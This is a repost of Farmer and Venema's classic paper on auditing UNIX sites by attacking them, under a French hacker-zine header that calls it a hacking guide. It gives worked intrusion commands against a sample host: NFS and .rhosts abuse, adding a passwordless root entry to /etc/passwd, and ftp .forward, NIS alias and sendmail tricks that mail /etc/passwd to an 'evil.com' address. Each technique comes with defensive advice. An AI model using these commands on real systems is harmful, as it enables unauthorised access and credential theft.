"The private handbook" -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.11 Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type de hacking que l'on peut faire. C'est vraiment un document EXCELLENT !! _ _ _ _Improving the Security of Your Site by Breaking Into it_ Dan Farmer Wietse Venema Sun Microsystems Eindhoven University of Technology zen@sun.com wietse@wzv.win.tue.nl Introduction ------------ Every day, all over the world, computer networks and hosts are being broken into. The level of sophistication of these attacks varies widely; while it is generally believed that most break-ins succeed due to weak passwords, there are still a large number of intrusions that use more advanced techniques to break in. Less is known about the latter types of break-ins, because by their very nature they are much harder to detect. ----- CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley. Purdue. Sun. You name it, we've seen it broken into. Anything that is on the Internet (and many that isn't) seems to be fairly easy game. Are these targets unusual? What happened? Fade to... A young boy, with greasy blonde hair, sitting in a dark room. The room is illuminated only by the luminescense of the C64's 40 character screen. Taking another long drag from his Benson and Hedges cigarette, the weary system cracker telnets to the next faceless ".mil" site on his hit list. "guest -- guest", "root -- root", and "system -- manager" all fail. No matter. He has all night... he pencils the host off of his list, and tiredly types in the next potential victim... This seems to be the popular image of a system cracker. Young, inexperienced, and possessing vast quantities of time to waste, to get into just one more system. However, there is a far more dangerous type of system cracker out there. One who knows the ins and outs of the latest security auditing and cracking tools, who can modify them for specific attacks, and who can write his/her own programs. One who not only reads about the latest security holes, but also personally discovers bugs and vulnerabilities. A deadly creature that can both strike poisonously and hide its tracks without a whisper or hint of a trail. The uebercracker is here. ----- Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's uebermensch, or, literally translated into English, "over man." Nietzsche used the term not to refer to a comic book superman, but instead a man who had gone beyond the incompetence, pettiness, and weakness of the everyday man. The uebercracker is therefore the system cracker who has gone beyond simple cookbook methods of breaking into systems. An uebercracker is not usually motivated to perform random acts of violence. Targets are not arbitrary -- there is a purpose, whether it be personal monetary gain, a hit and run raid for information, or a challenge to strike a major or prestigious site or net.personality. An uebercracker is hard to detect, harder to stop, and hardest to keep out of your site for good. Overview -------- In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show _why_ it is one. We will illustrate that even seemingly harmless network services can become valuable tools in the search for weak points of a system, even when these services are operating exactly as they are intended to. In an effort to shed some light on how more advanced intrusions occur, this paper outlines various mechanisms that crackers have actually used to obtain access to systems and, in addition, some techniques we either suspect intruders of using, or that we have used ourselves in tests or in friendly/authorized environments. Our motivation for writing this paper is that system administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. While it is widely known that the proper level of protection depends on what has to be protected, many sites appear to lack the resources to assess what level of host and network security is adequate. By showing what intruders can do to gain access to a remote site, we are trying to help system administrators to make _informed_ decisions on how to secure their site -- or not. We will limit the discussion to techniques that can give a remote intruder access to a (possibly non-interactive) shell process on a UNIX host. Once this is achieved, the details of obtaining root privilege are beyond the scope of this work -- we consider them too site-dependent and, in many cases, too trivial to merit much discussion. We want to stress that we will not merely run down a list of bugs or security holes -- there will always be new ones for a potential attacker to exploit. The purpose of this paper is to try to get the reader to look at her or his system in a new way -- one that will hopefully afford him or her the opportunity to _understand_ how their system can be compromised, and how. We would also like to reiterate to the reader that the purpose of this paper is to show you how to test the security of your own site, not how to break into other people's systems. The intrusion techniques we illustrate here will often leave traces in your system auditing logs -- it might be constructive to examine them after trying some of these attacks out, to see what a real attack might look like. Certainly other sites and system administrators will take a very dim view of your activities if you decide to use their hosts for security testing without advance authorization; indeed, it is quite possible that legal action may be pursued against you if they perceive it as an attack. There are four main parts to the paper. The first part is the introduction and overview. The second part attempts to give the reader a feel for what it is like to be an intruder and how to go from knowing nothing about a system to compromising its security. This section goes over actual techniques to gain information and entrance and covers basic strategies such as exploiting trust and abusing improperly configured basic network services (ftp, mail, tftp, etc.) It also discusses slightly more advanced topics, such as NIS and NFS, as well as various common bugs and configuration problems that are somewhat more OS or system specific. Defensive strategies against each of the various attacks are also covered here. The third section deals with trust: how the security of one system depends on the integrity of other systems. Trust is the most complex subject in this paper, and for the sake of brevity we will limit the discussion to clients in disguise. The fourth section covers the basic steps that a system administrator may take to protect her or his system. Most of the methods presented here are merely common sense, but they are often ignored in practice -- one of our goals is to show just how dangerous it can be to ignore basic security practices. Case studies, pointers to security-related information, and software are described in the appendices at the end of the paper. While exploring the methods and strategies discussed in this paper we we wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in shell, perl, expect and C, it examines a remote host or set of hosts and gathers as much information as possible by remotely probing NIS, finger, NFS, ftp and tftp, rexd, and other services. This information includes the presence of various network information services as well as potential security flaws -- usually in the form of incorrectly setup or configured network services, well-known bugs in system or network utilities, or poor or ignorant policy decisions. It then can either report on this data or use an expert system to further investigate any potential security problems. While SATAN doesn't use all of the methods that we discuss in the paper, it has succeeded with ominous regularity in finding serious holes in the security of Internet sites. It will be posted and made available via anonymous ftp when completed; Appendix A covers its salient features. Note that it isn't possible to cover all possible methods of breaking into systems in a single paper. Indeed, we won't cover two of the most effective methods of breaking into hosts: social engineering and password cracking. The latter method is so effective, however, that several of the strategies presented here are geared towards acquiring password files. In addition, while windowing systems (X, OpenWindows, etc.) can provide a fertile ground for exploitation, we simply don't know many methods that are used to break into remote systems. Many system crackers use non-bitmapped terminals which can prevent them from using some of the more interesting methods to exploit windowing systems effectively (although being able to monitor the victim's keyboard is often sufficient to capture passwords). Finally, while worms, viruses, trojan horses, and other malware are very interesting, they are not common (on UNIX systems) and probably will use similar techniques to the ones we describe in this paper as individual parts to their attack strategy. Gaining Information ------------------- Let us assume that you are the head system administrator of Victim Incorporated's network of UNIX workstations. In an effort to secure your machines, you ask a friendly system administrator from a nearby site (evil.com) to give you an account on one of her machines so that you can look at your own system's security from the outside. What should you do? First, try to gather information about your (target) host. There is a wealth of network services to look at: finger, showmount, and rpcinfo are good starting points. But don't stop there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp, and as many other services as you can find. There are so many methods and techniques that space precludes us from showing all of them, but we will try to show a cross-section of the most common and/or dangerous strategies that we have seen or have thought of. Ideally, you would gather such information about all hosts on the subnet or area of attack -- information is power -- but for now we'll examine only our intended target. To start out, you look at what the ubiquitous finger command shows you (assume it is 6pm, Nov 6, 1993): victim % finger @victim.com [victim.com] Login Name TTY Idle When Where zen Dr. Fubar co 1d Wed 08:00 death.com Good! A single idle user -- it is likely that no one will notice if you actually manage to break in. Now you try more tactics. As every finger devotee knows, fingering "@", "0", and "", as well as common names, such as root, bin, ftp, system, guest, demo, manager, etc., can reveal interesting information. What that information is depends on the version of finger that your target is running, but the most notable are account names, along with their home directories and the host that they last logged in from. To add to this information, you can use rusers (in particular with the -l flag) to get useful information on logged-in users. Trying these commands on victim.com reveals the following information, presented in a compressed tabular form to save space: Login Home-dir Shell Last login, from where ----- -------- ----- ---------------------- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com bin /bin Never logged in nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com guest /export/foo /bin/sh Never logged in ftp /home/ftp Never logged in Both our experiments with SATAN and watching system crackers at work have proved to us that finger is one of the most dangerous services, because it is so useful for investigating a potential target. However, much of this information is useful only when used in conjunction with other data. For instance, running showmount on your target reveals: evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy Note that /export/foo is exported to the world; also note that this is user guest's home directory. Time for your first break-in! In this case, you'll mount the home directory of user "guest." Since you don't have a corresponding account on the local machine and since root cannot modify files on an NFS mounted filesystem, you create a "guest" account in your local password file. As user guest you can put an .rhosts entry in the remote guest home directory, which will allow you to login to the target machine without having to supply a password. evil # mount victim.com:/export/foo /foo evil # cd /foo evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd evil # ls -lag total 3 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 .. 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest evil # su guest evil % echo victim.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com! victim % If, instead of home directories, victim.com were exporting filesystems with user commands (say, /usr or /usr/local/bin), you could replace a command with a trojan horse that executes any command of your choice. The next user to execute that command would execute your program. We suggest that filesystems be exported: o Read/write only to specific, trusted clients. o Read-only, where possible (data or programs can often be exported in this manner.) If the target has a "+" wildcard in its /etc/hosts.equiv (the default in various vendor's machines) or has the netgroups bug (CERT advisory 91:12), any non-root user with a login name in the target's password file can rlogin to the target without a password. And since the user "bin" often owns key files and directories, your next attack is to try to log in to the target host and modify the password file to let you have root access: evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ls -ldg /etc drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % rlogin victim.com -l toor Welcome to victim.com! victim # A few notes about the method used above; "rsh victim.com csh -i" is used to initially get onto the system because it doesn't leave any traces in the wtmp or utmp system auditing files, making the rsh invisible for finger and who. The remote shell isn't attached to a pseudo-terminal, however, so that screen-oriented programs such as pagers and editors will fail -- but it is very handy for brief exploration. The COPS security auditing tool (see appendix D) will report key files or directories that are writable to accounts other than the superuser. If you run SunOS 4.x you can apply patch 100103 to fix most file permission problems. On many systems, rsh probes as shown above, even when successful, would remain completely unnoticed; the tcp wrapper (appendix D), which logs incoming connections, can help to expose such activities. ---- What now? Have you uncovered all the holes on your target system? Not by a long shot. Going back to the finger results on your target, you notice that it has an "ftp" account, which usually means that anonymous ftp is enabled. Anonymous ftp can be an easy way to get access, as it is often misconfigured. For example, the target may have a complete copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory instead of a stripped down version. In this example, though, you see that the latter doesn't seem to be true (how can you tell without actually examining the file?) However, the home directory of ftp on victim.com is writable. This allows you to remotely execute a command -- in this case, mailing the password file back to yourself -- by the simple method of creating a .forward file that executes a command when mail is sent to the ftp account. This is the same mechanism of piping mail to a program that the "vacation" program uses to automatically reply to mail messages. evil % cat forward_sucker_file "|/bin/mail zen@evil.com < /etc/passwd" evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen): ftp 331 Guest login ok, send ident as password. Password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward 43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit evil % echo test | mail ftp@victim.com Now you simply wait for the password file to be sent back to you. The security auditing tool COPS will check your anonymous ftp setup; see the man page for ftpd, the documentation/code for COPS, or CERT advisory 93:10 for information on how to set up anonymous ftp correctly. Vulnerabilities in ftp are often a matter of incorrect ownership or permissions of key files or directories. At the very least, make sure that ~ftp and all "system" directories and files below ~ftp are owned by root and are not writable by any user. While looking at ftp, you can check for an older bug that was once widely exploited: % ftp -n ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. ftp> ls -al / (or whatever) If this works, you now are logged in as root, and able to modify the password file, or whatever you desire. If your system exhibits this bug, you should definitely get an update to your ftpd daemon, either from your vendor or (via anon ftp) from ftp.uu.net. The wuarchive ftpd, a popular replacement ftp daemon put out by the Washington University in Saint Louis, had almost the same problem. If your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a more recent version. Finally, there is a program vaguely similar to ftp -- tftp, or the trivial file transfer program. This daemon doesn't require any password for authentication; if a host provides tftp without restricting the access (usually via some secure flag set in the inetd.conf file), an attacker can read and write files anywhere on the system. In the example, you get the remote password file and place it in your local /tmp directory: evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit For security's sake, tftp should not be run; if tftp is necessary, use the secure option/flag to restrict access to a directory that has no valuable information, or run it under the control of a chroot wrapper program. ---- If none of the previous methods have worked, it is time to go on to more drastic measures. You have a friend in rpcinfo, another very handy program, sometimes even more useful than finger. Many hosts run RPC services that can be exploited; rpcinfo can talk to the portmapper and show you the way. It can tell you if the host is running NIS, if it is a NIS server or slave, if a diskless workstation is around, if it is running NFS, any of the info services (rusersd, rstatd, etc.), or any other unusual programs (auditing or security related). For instance, going back to our sample target: evil % rpcinfo -p victim.com [output trimmed for brevity's sake] program vers proto port 100004 2 tcp 673 ypserv 100005 1 udp 721 mountd 100003 2 udp 2049 nfs 100026 1 udp 733 bootparam 100017 1 tcp 1274 rexd In this case, you can see several significant facts about our target; first of which is that it is an NIS server. It is perhaps not widely known, but once you know the NIS domainname of a server, you can get any of its NIS maps by a simple rpc query, even when you are outside the subnet served by the NIS server (for example, using the YPX program that can be found in the comp.sources.misc archives on ftp.uu.net). In addition, very much like easily guessed passwords, many systems use easily guessed NIS domainnames. Trying to guess the NIS domainname is often very fruitful. Good candidates are the fully and partially qualified hostname (e.g. "victim" and "victim.com"), the organization name, netgroup names in "showmount" output, and so on. If you wanted to guess that the domainname was "victim", you could type: evil % ypwhich -d victim victim.com Domain victim not bound. This was an unsuccessful attempt; if you had guessed correctly it would have returned with the host name of victim.com's NIS server. However, note from the NFS section that victim.com is exporting the "/var" directory to the world. All that is needed is to mount this directory and look in the "yp" subdirectory -- among other things you will see another subdirectory that contains the domainname of the target. evil # mount victim.com:/var /foo evil # cd /foo evil # /bin/ls -alg /foo/yp total 17 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 . 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 .. 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar [...] In this case, "foo_bar" is the NIS domain name. In addition, the NIS maps often contain a good list of user/employee names as well as internal host lists, not to mention passwords for cracking. Appendix C details the results of a case study on NIS password files. ---- You note that the rpcinfo output also showed that victim.com runs rexd. Like the rsh daemon, rexd processes requests of the form "please execute this command as that user". Unlike rshd, however, rexd does not care if the client host is in the hosts.equiv or .rhost files. Normally the rexd client program is the "on" command, but it only takes a short C program to send arbitrary client host and userid information to the rexd server; rexd will happily execute the command. For these reasons, running rexd is similar to having no passwords at all: all security is in the client, not in the server where it should be. Rexd security can be improved somewhat by using secure RPC. ---- While looking at the output from rpcinfo, you observe that victim.com also seems to be a server for diskless workstations. This is evidenced by the presence of the bootparam service, which provides information to the diskless clients for booting. If you ask nicely, using BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get its NIS domainname. This can be very useful when combined with the fact that you can get arbitrary NIS maps (such as the password file) when you know the NIS domainname. Here is a sample code snippet to do just that (bootparam is part of SATAN.) char *server; struct bp_whoami_arg arg; /* query */ struct bp_whoami_res res; /* reply */ /* initializations omitted... */ callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res); printf("%s has nisdomain %s\n", server, res.domain_name); The showmount output indicated that "easy" is a diskless client of victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI query: evil % bootparam victim.com easy.victim.com victim.com has nisdomain foo_bar ---- NIS masters control the mail aliases for the NIS domain in question. Just like local mail alias files, you can create a mail alias that will execute commands when mail is sent to it (a once popular example of this is the "decode" alias which uudecodes mail files sent to it.) For instance, here you create an alias "foo", which mails the password file back to evil.com by simply mailing any message to it: nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases nis-master # cd /var/yp nis-master # make aliases nis-master # echo test | mail -v foo@victim.com Hopefully attackers won't have control of your NIS master host, but even more hopefully the lesson is clear -- NIS is normally insecure, but if an attacker has control of your NIS master, then s/he effectively has control of the client hosts (e.g. can execute arbitrary commands). There aren't many effective defenses against NIS attacks; it is an insecure service that has almost no authentication between clients and servers. To make things worse, it seems fairly clear that arbitrary maps can be forced onto even master servers (e.g., it is possible to treat an NIS server as a client). This, obviously, would subvert the entire schema. If it is absolutely necessary to use NIS, choosing a hard to guess domainname can help slightly, but if you run diskless clients that are exposed to potential attackers then it is trivial for an attacker to defeat this simple step by using the bootparam trick to get the domainname. If NIS is used to propagate the password maps, then shadow passwords do not give additional protection because the shadow map is still accessible to any attacker that has root on an attacking host. Better is to use NIS as little as possible, or to at least realize that the maps can be subject to perusal by potentially hostile forces. Secure RPC goes a long way to diminish the threat, but it has its own problems, primarily in that it is difficult to administer, but also in that the cryptographic methods used within are not very strong. It has been rumored that NIS+, Sun's new network information service, fixes some of these problems, but until now it has been limited to running on Suns, and thus far has not lived up to the promise of the design. Finally, using packet filtering (at the very least port 111) or securelib (see appendix D), or, for Suns, applying Sun patch 100482-02 all can help. ---- The portmapper only knows about RPC services. Other network services can be located with a brute-force method that connects to all network ports. Many network utilities and windowing systems listen to specific ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is usually on port 6000, etc.) SATAN includes a program that scans the ports of a remote hosts and reports on its findings; if you run it against our target, you see: evil % tcpmap victim.com Mapping 128.128.128.1 port 21: ftp port 23: telnet port 25: smtp port 37: time port 79: finger port 512: exec port 513: login port 514: shell port 515: printer port 6000: (X) This suggests that victim.com is running X windows. If not protected properly (via the magic cookie or xhost mechanisms), window displays can be captured or watched, user keystrokes may be stolen, programs executed remotely, etc. Also, if the target is running X and accepts a telnet to port 6000, that can be used for a denial of service attack, as the target's windowing system will often "freeze up" for a short period of time. One method to determine the vulnerability of an X server is to connect to it via the XOpenDisplay() function; if the function returns NULL then you cannot access the victim's display (opendisplay is part of SATAN): char *hostname; if (XOpenDisplay(hostname) == NULL) { printf("Cannot open display: %s\n", hostname); } else { printf("Can open display: %s\n", hostname); } evil % opendisplay victim.com:0 Cannot open display: victim.com:0 X terminals, though much less powerful than a complete UNIX system, can have their own security problems. Many X terminals permit unrestricted rsh access, allowing you to start X client programs in the victim's terminal with the output appearing on your own screen: evil % xhost +xvictim.victim.com evil % rsh xvictim.victim.com telnet victim.com -display evil.com In any case, give as much thought to your window security as your filesystem and network utilities, for it can compromise your system as surely as a "+" in your hosts.equiv or a passwordless (root) account. ---- Next, you examine sendmail. Sendmail is a very complex program that has a long history of security problems, including the infamous "wiz" command (hopefully long since disabled on all machines). You can often determine the OS, sometimes down to the version number, of the target, by looking at the version number returned by sendmail. This, in turn, can give you hints as to how vulnerable it might be to any of the numerous bugs. In addition, you can see if they run the "decode" alias, which has its own set of problems: evil % telnet victim.com 25 connecting to host victim.com (128.128.128.1.), port 25 connection open 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit Running the "decode" alias is a security risk -- it allows potential attackers to overwrite any file that is writable by the owner of that alias -- often daemon, but potentially any user. Consider this piece of mail -- this will place "evil.com" in user zen's .rhosts file if it is writable: evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com If no home directories are known or writable, an interesting variation of this is to create a bogus /etc/aliases.pag file that contains an alias with a command you wish to execute on your target. This may work since on many systems the aliases.pag and aliases.dir files, which control the system's mail aliases, are writable to the world. evil % cat decode bin: "| cat /etc/passwd | mail zen@evil.com" evil % newaliases -oQ/tmp -oA`pwd`/decode evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null A lot of things can be found out by just asking sendmail if an address is acceptable (vrfy), or what an address expands to (expn). When the finger or rusers services are turned off, vrfy and expn can still be used to identify user accounts or targets. Vrfy and expn can also be used to find out if the user is piping mail through any program that might be exploited (e.g. vacation, mail sorters, etc.). It can be a good idea to disable the vrfy and expn commands: in most versions, look at the source file srvrsmtp.c, and either delete or change the two lines in the CmdTab structure that have the strings "vrfy" and "expn". Sites without source can still disable expn and vrfy by just editing the sendmail executable with a binary editor and replacing "vrfy" and "expn" with blanks. Acquiring a recent version of sendmail (see Appendix D) is also an extremely good idea, since there have probably been more security bugs reported in sendmail than in any other UNIX program. ---- As a sendmail-sendoff, there are two fairly well known bugs that should be checked into. The first was definitely fixed in version 5.59 from Berkeley; despite the messages below, for versions of sendmail previous to 5.59, the "evil.com" gets appended, despite the error messages, along with all of the typical mail headers, to the file specified: % cat evil_sendmail telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen data random garbage . rcpt to: /home/zen/.rhosts mail from: zen data evil.com . quit EOSM evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'. Connection closed by foreign host. evil % rlogin victim.com -l zen Welcome to victim.com! victim % The second hole, fixed only recently, permitted anyone to specify arbitrary shell commands and/or pathnames for the sender and/or destination address. Attempts to keep details secret were in vain, and extensive discussions in mailing lists and usenet news groups led to disclosure of how to exploit some versions of the bug. As with many UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem, since they all share a common source code tree ancestry. Space precludes us from discussing it fully, but a typical attack to get the password file might look like this: evil % telnet victim.com 25 Trying 128.128.128.1... Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail zen@evil.com < /etc/passwd" 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. evil % At the time of writing, version 8.6.4 of sendmail (see Appendix D for information on how to get this) is reportedly the only variant of sendmail with all of the recent security bugs fixed. Trust ----- For our final topic of vulnerability, we'll digress from the practical strategy we've followed previously to go a bit more into the theoretical side, and briefly discuss the notion of trust. The issues and implications of vulnerabilities here are a bit more subtle and far-reaching than what we've covered before; in the context of this paper we use the word trust whenever there is a situation when a server (note that any host that allows remote access can be called a server) can permit a local resource to be used by a client without password authentication when password authentication is normally required. In other words, we arbitrarily limit the discussion to clients in disguise. There are many ways that a host can trust: .rhosts and hosts.equiv files that allow access without password verification; window servers that allow remote systems to use and abuse privileges; export files that control access via NFS, and more. Nearly all of these rely on client IP address to hostname conversion to determine whether or not service is to be granted. The simplest method uses the /etc/hosts file for a direct lookup. However, today most hosts use either DNS (the Domain Name Service), NIS, or both for name lookup service. A reverse lookup occurs when a server has an IP address (from a client host connecting to it) and wishes to get the corresponding client hostname. Although the concept of how host trust works is well understood by most system administrators, the _dangers_ of trust, and the _practical_ problem it represents, irrespective of hostname impersonation, is one of the least understood problems we know of on the Internet. This goes far beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing systems -- indeed, much of the useful services in UNIX are based on the concept that well known (to an administrator or user) sites are trusted in some way. What is not understood is how networking so tightly binds security between what are normally considered disjoint hosts. Any form of trust can be spoofed, fooled, or subverted, especially when the authority that gets queried to check the credentials of the client is either outside of the server's administrative domain, or when the trust mechanism is based on something that has a weak form of authentication; both are usually the case. Obviously, if the host containing the database (either NIS, DNS, or whatever) has been compromised, the intruder can convince the target host that s/he is coming from any trusted host; it is now sufficient to find out which hosts are trusted by the target. This task is often greatly helped by examining where system administrators and system accounts (such as root, etc.) last logged in from. Going back to our target, victim.com, you note that root and some other system accounts logged in from big.victim.com. You change the PTR record for evil.com so that when you attempt to rlogin in from evil.com to victim.com, victim.com will attempt to look up your hostname and will find what you placed in the record. If the record in the DNS database looks like: 1.192.192.192.in-addr.arpa IN PTR evil.com And you change it to: 1.192.192.192.in-addr.arpa IN PTR big.victim.com then, depending on how naive victim.com's system software is, victim.com will believe the login comes from big.victim.com, and, assuming that big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be able to login without supplying a password. With NIS, it is a simple matter of either editing the host database on the NIS master (if this is controlled by the intruder) or of spoofing or forcing NIS (see discussion on NIS security above) to supply the target with whatever information you desire. Although more complex, interesting, and damaging attacks can be mounted via DNS, time and space don't allow coverage of these methods here. Two methods can be used to prevent such attacks. The first is the most direct, but perhaps the most impractical. If your site doesn't use any trust, you won't be as vulnerable to host spoofing. The other strategy is to use cryptographic protocols. Using the secure RPC protocol (used in secure NFS, NIS+, etc.) is one method; although it has been "broken" cryptographically, it still provides better assurance than RPC authentication schemes that do not use any form of encryption. Other solutions, both hardware (smartcards) and software (Kerberos), are being developed, but they are either incomplete or require changes to system software. Appendix B details the results of an informal survey taken from a variety of hosts on the Internet. Protecting the system --------------------- It is our hope that we have demonstrated that even some of the most seemingly innocuous services run can offer (sometimes unexpectedly) ammunition to determined system crackers. But, of course, if security were all that mattered, computers would never be turned on, let alone hooked into a network with literally millions of potential intruders. Rather than reiterating specific advice on what to switch on or off, we instead offer some general suggestions: o If you cannot turn off the finger service, consider installing a modified finger daemon. It is rarely necessary to reveal a user's home directory and the source of last login. o Don't run NIS unless it's absolutely necessary. Use NFS as little as possible. o Never export NFS filesystems unrestricted to the world. Try to export file systems read-only where possible. o Fortify and protect servers (e.g. hosts that provide a service to other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative accounts on these hosts. o Examine carefully services offered by inetd and the portmapper. Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd wrappers, if for no other reason than to log the sources of connections to your host. This adds immeasurably to the standard UNIX auditing features, especially with respect to network attacks. If possible, use the loghost mechanism of syslog to collect security-related information on a secure host. o Eliminate trust unless there is an absolute need for it. Trust is your enemy. o Use shadow passwords and a passwd command that disallows poor passwords. Disable or delete unused/dormant system or user accounts. o Keep abreast of current literature (see our suggested reading list and bibliography at the end of this paper) and security tools; communicate to others about security problems and incidents. At minimum, subscribe to the CERT mailing list and phrack magazine (plus the firewalls mailing list, if your site is using or thinking about installing a firewall) and read the usenet security newsgroups to get the latest information on security problems. Ignorance is the deadliest security problem we are aware of. o Install all vendor security patches as soon as possible, on all of your hosts. Examine security patch information for other vendors - many bugs (rdist, sendmail) are common to many UNIX variants. It is interesting to note that common solutions to security problems such as running Kerberos or using one-time passwords or digital tokens are ineffective against most of the attacks we discuss here. We heartily recommend the use of such systems, but be aware that they are _not_ a total security solution -- they are part of a larger struggle to defend your system. Conclusions ----------- Perhaps none of the methods shown here are surprising; when writing this paper, we didn't learn very much about how to break into systems. What we _did_ learn was, while testing these methods out on our own systems and that of friendly sites, just how effective this set of methods is for gaining access to a typical (UNIX) Internet host. Tiring of trying to type these in all by hand, and desiring to keep our own systems more secure, we decided to implement a security tool (SATAN) that attempts to check remote hosts for at least some of the problems discussed here. The typical response, when telling people about our paper and our tool was something on the order of "that sounds pretty dangerous -- I hope you're not going to give it out to everybody. But you since you can trust me, may I have a copy of it?" We never set out to create a cookbook or toolkit of methods and programs on how to break into systems -- instead, we saw that these same methods were being used, every day, against ourselves and against friendly system administrators. We believe that by propagating information that normally wasn't available to those outside of the underworld, we can increase security by raising awareness. Trying to restrict access to "dangerous" security information has never seemed to be a very effective method for increasing security; indeed, the opposite appears to be the case, since the system crackers have shown little reticence to share their information with each other. While it is almost certain that some of the information presented here is new material to (aspiring) system crackers, and that some will use it to gain unauthorized entrance onto hosts, the evidence presented even by our ad hoc tests shows that there is a much larger number of insecure sites, simply because the system administrators don't know any better -- they aren't stupid or slow, they simply are unable to spend the very little free time that they have to explore all of the security issues that pertain to their systems. Combine that with no easy access to this sort of information and you have poorly defended systems. We (modestly) hope that this paper will provide badly-needed data on how systems are broken into, and further, to explain _why_ certain steps should be taken to secure a system. Knowing why something is a problem is, in our opinion, the real key to learning and to making an informed, intelligent choice as to what security really means for your site. ---- Appendix A: SATAN (Security Analysis Tool for Auditing Networks) Originally conceived some years ago, SATAN is actually the prototype of a much larger and more comprehensive vision of a security tool. In its current incarnation, SATAN remotely probes and reports various bugs and weaknesses in network services and windowing systems, as well as detailing as much generally useful information as possible about the target(s). It then processes the data with a crude filter and what might be termed an expert system to generate the final security analysis. While not particularly fast, it is extremely modular and easy to modify. SATAN consists of several sub-programs, each of which is an executable file (perl, shell, compiled C binary, whatever) that tests a host for a given potential weakness. Adding further test programs is as simple as putting an executable into the main directory with the extension ".sat"; the driver program will automatically execute it. The driver generates a set of targets (using DNS and a fast version of ping together to get "live" targets), and then executes each of the programs over each of the targets. A data filtering/interpreting program then analyzes the output, and lastly a reporting program digests everything into a more readable format. The entire package, including source code and documentation, will be made freely available to the public, via anonymous ftp and by posting it to one of the numerous source code groups on the Usenet. ---- Appendix B: An informal survey conducted on about a dozen Internet sites (educational, military, and commercial, with over 200 hosts and 40000 accounts) revealed that on the average, close to 10 percent of a site's accounts had .rhosts files. These files averaged six trusted hosts each; however, it was not uncommon to have well over one hundred entries in an account's .rhosts file, and on a few occasions, the number was over five hundred! (This is not a record one should be proud of owning.) In addition, _every_ site directly on the internet (one site was mostly behind a firewall) trusted a user or host at another site -- thus, the security of the site was not under the system administrators direct control. The larger sites, with more users and hosts, had a lower percentage of users with .rhosts 